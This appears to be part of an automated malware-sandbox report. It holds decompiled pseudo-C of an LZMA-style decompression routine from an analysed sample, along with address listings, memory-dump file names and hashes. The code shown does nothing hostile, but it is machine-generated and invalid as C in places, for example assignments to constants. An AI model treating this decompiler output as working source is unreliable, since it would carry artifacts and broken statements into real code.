											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                            0x00000000
                            0x00407395
                            0x00407395
                            0x00407399
                            0x004073be
                            0x004073c8
                            0x00000000
                            0x0040739b
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a8
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00407489
                            0x00407489
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00407447
                            0x00407447
                            0x00407447
                            0x00406be3
                            0x00406be3
                            0x00406be3
                            0x00406bec
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x00000000
                            0x00406bfd
                            0x00000000
                            0x00000000
                            0x00406c06
                            0x00406c09
                            0x00406c0c
                            0x00406c10
                            0x00000000
                            0x00000000
                            0x00406c16
                            0x00406c19
                            0x00406c1b
                            0x00406c1c
                            0x00406c1f
                            0x00406c21
                            0x00406c22
                            0x00406c24
                            0x00406c27
                            0x00406c2c
                            0x00406c31
                            0x00406c3a
                            0x00406c4d
                            0x00406c50
                            0x00406c5c
                            0x00406c84
                            0x00406c86
                            0x00406c94
                            0x00406c94
                            0x00406c98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406c88
                            0x00406c88
                            0x00406c8b
                            0x00406c8c
                            0x00406c8c
                            0x00000000
                            0x00406c88
                            0x00406c62
                            0x00406c67
                            0x00406c67
                            0x00406c70
                            0x00406c78
                            0x00406c7b
                            0x00000000
                            0x00406c81
                            0x00406c81
                            0x00000000
                            0x00406c81
                            0x00000000
                            0x00406c9e
                            0x00406c9e
                            0x00406ca2
                            0x0040754e
                            0x00000000
                            0x0040754e
                            0x00406cab
                            0x00406cbb
                            0x00406cbe
                            0x00406cc1
                            0x00406cc1
                            0x00406cc1
                            0x00406cc4
                            0x00406cc8
                            0x00000000
                            0x00000000
                            0x00406cca
                            0x00406cd0
                            0x00406cfa
                            0x00406d00
                            0x00406d07
                            0x00000000
                            0x00406d07
                            0x00406cd6
                            0x00406cd9
                            0x00406cde
                            0x00406cde
                            0x00406ce9
                            0x00406cf1
                            0x00406cf4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d39
                            0x00406d3f
                            0x00406d42
                            0x00406d4f
                            0x00406d57
                            0x00000000
                            0x00000000
                            0x00406d0e
                            0x00406d0e
                            0x00406d12
                            0x0040755d
                            0x00000000
                            0x0040755d
                            0x00406d1e
                            0x00406d29
                            0x00406d29
                            0x00406d29
                            0x00406d2c
                            0x00406d2f
                            0x00406d32
                            0x00406d37
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040741c
                            0x00407420
                            0x004075cf
                            0x00000000
                            0x004075cf
                            0x0040742c
                            0x00407433
                            0x0040743b
                            0x0040743e
                            0x00407441
                            0x00407441
                            0x00000000
                            0x00000000
                            0x00406d5f
                            0x00406d61
                            0x00406d64
                            0x00406dd5
                            0x00406dd8
                            0x00406ddb
                            0x00406de2
                            0x00406dec
                            0x00000000
                            0x00406dec
                            0x00406d66
                            0x00406d6a
                            0x00406d6d
                            0x00406d6f
                            0x00406d72
                            0x00406d75
                            0x00406d77
                            0x00406d7a
                            0x00406d7c
                            0x00406d81
                            0x00406d84
                            0x00406d87
                            0x00406d8b
                            0x00406d92
                            0x00406d95
                            0x00406d9c
                            0x00406da0
                            0x00406da8
                            0x00406da8
                            0x00406da8
                            0x00406da2
                            0x00406da2
                            0x00406da2
                            0x00406d97
                            0x00406d97
                            0x00406d97
                            0x00406dac
                            0x00406daf
                            0x00406dcd
                            0x00406dcf
                            0x00000000
                            0x00406db1
                            0x00406db1
                            0x00406db4
                            0x00406db7
                            0x00406dba
                            0x00406dbc
                            0x00406dbc
                            0x00406dbc
                            0x00406dbf
                            0x00406dc2
                            0x00406dc4
                            0x00406dc5
                            0x00406dc8
                            0x00000000
                            0x00406dc8
                            0x00000000
                            0x00406ffe
                            0x00407002
                            0x00407020
                            0x00407023
                            0x0040702a
                            0x0040702d
                            0x00407030
                            0x00407033
                            0x00407036
                            0x00407039
                            0x0040703b
                            0x00407042
                            0x00407043
                            0x00407045
                            0x00407048
                            0x0040704b
                            0x0040704e
                            0x0040704e
                            0x00407053
                            0x00000000
                            0x00407053
                            0x00407004
                            0x00407007
                            0x0040700a
                            0x00407014
                            0x00000000
                            0x00000000
                            0x00407068
                            0x0040706c
                            0x0040708f
                            0x00407092
                            0x00407095
                            0x0040709f
                            0x0040706e
                            0x0040706e
                            0x00407071
                            0x00407074
                            0x00407077
                            0x00407084
                            0x00407087
                            0x00407087
                            0x00000000
                            0x00000000
                            0x004070ab
                            0x004070af
                            0x00000000
                            0x00000000
                            0x004070b5
                            0x004070b9
                            0x00000000
                            0x00000000
                            0x004070bf
                            0x004070c1
                            0x004070c5
                            0x004070c5
                            0x004070c8
                            0x004070cc
                            0x00000000
                            0x00000000
                            0x0040711c
                            0x00407120
                            0x00407127
                            0x0040712a
                            0x0040712d
                            0x00407137
                            0x00000000
                            0x00407137
                            0x00407122
                            0x00000000
                            0x00000000
                            0x00407143
                            0x00407147
                            0x0040714e
                            0x00407151
                            0x00407154
                            0x00407149
                            0x00407149
                            0x00407149
                            0x00407157
                            0x0040715a
                            0x0040715d
                            0x0040715d
                            0x00407160
                            0x00407163
                            0x00407166
                            0x00407166
                            0x00407169
                            0x00407170
                            0x00407175
                            0x00000000
                            0x00000000
                            0x00407203
                            0x00407203
                            0x00407207
                            0x004075a5
                            0x00000000
                            0x004075a5
                            0x0040720d
                            0x00407210
                            0x00407213
                            0x00407217
                            0x0040721a
                            0x00407220
                            0x00407222
                            0x00407222
                            0x00407222
                            0x00407225
                            0x00407228
                            0x00000000
                            0x00000000
                            0x00406df8
                            0x00406df8
                            0x00406dfc
                            0x00407569
                            0x00000000
                            0x00407569
                            0x00406e02
                            0x00406e05
                            0x00406e08
                            0x00406e0c
                            0x00406e0f
                            0x00406e15
                            0x00406e17
                            0x00406e17
                            0x00406e17
                            0x00406e1a
                            0x00406e1d
                            0x00406e1d
                            0x00406e20
                            0x00406e23
                            0x00000000
                            0x00000000
                            0x00406e29
                            0x00406e2f
                            0x00000000
                            0x00000000
                            0x00406e35
                            0x00406e35
                            0x00406e39
                            0x00406e3c
                            0x00406e3f
                            0x00406e42
                            0x00406e45
                            0x00406e46
                            0x00406e49
                            0x00406e4b
                            0x00406e51
                            0x00406e54
                            0x00406e57
                            0x00406e5a
                            0x00406e5d
                            0x00406e60
                            0x00406e63
                            0x00406e7f
                            0x00406e82
                            0x00406e85
                            0x00406e88
                            0x00406e8f
                            0x00406e93
                            0x00406e95
                            0x00406e99
                            0x00406e65
                            0x00406e65
                            0x00406e69
                            0x00406e71
                            0x00406e76
                            0x00406e78
                            0x00406e7a
                            0x00406e7a
                            0x00406e9c
                            0x00406ea3
                            0x00406ea6
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eb1
                            0x00406eb1
                            0x00406eb5
                            0x00407575
                            0x00000000
                            0x00407575
                            0x00406ebb
                            0x00406ebe
                            0x00406ec1
                            0x00406ec5
                            0x00406ec8
                            0x00406ece
                            0x00406ed0
                            0x00406ed0
                            0x00406ed0
                            0x00406ed3
                            0x00406ed6
                            0x00406ed6
                            0x00406ed6
                            0x00406edc
                            0x00000000
                            0x00000000
                            0x00406ede
                            0x00406ee1
                            0x00406ee4
                            0x00406ee7
                            0x00406eea
                            0x00406eed
                            0x00406ef0
                            0x00406ef3
                            0x00406ef6
                            0x00406ef9
                            0x00406efc
                            0x00406f14
                            0x00406f17
                            0x00406f1a
                            0x00406f1d
                            0x00406f1d
                            0x00406f20
                            0x00406f24
                            0x00406f26
                            0x00406efe
                            0x00406efe
                            0x00406f06
                            0x00406f0b
                            0x00406f0d
                            0x00406f0f
                            0x00406f0f
                            0x00406f29
                            0x00406f30
                            0x00406f33
                            0x00000000
                            0x00406f35
                            0x00000000
                            0x00406f35
                            0x00406f33
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00000000
                            0x00000000
                            0x00406f75
                            0x00406f75
                            0x00406f79
                            0x00407581
                            0x00000000
                            0x00407581
                            0x00406f7f
                            0x00406f82
                            0x00406f85
                            0x00406f89
                            0x00406f8c
                            0x00406f92
                            0x00406f94
                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00406f9a
                            0x00406f9a
                            0x00406fa0
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00000000
                            0x00406f41
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fbd
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fe8
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406fed
                            0x00406ff4
                            0x00406ff7
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00407056
                            0x00407056
                            0x00407059
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00000000
                            0x00407482
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407546
                            0x00407447
                            0x00407447
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x00000000
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x004075e5
                            0x004075eb
                            0x004075ed
                            0x004075f4
                            0x004075f6
                            0x004075fd
                            0x00407601
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00407524
                            0x00000000
                            0x00407399

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                            • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                            • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                            • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
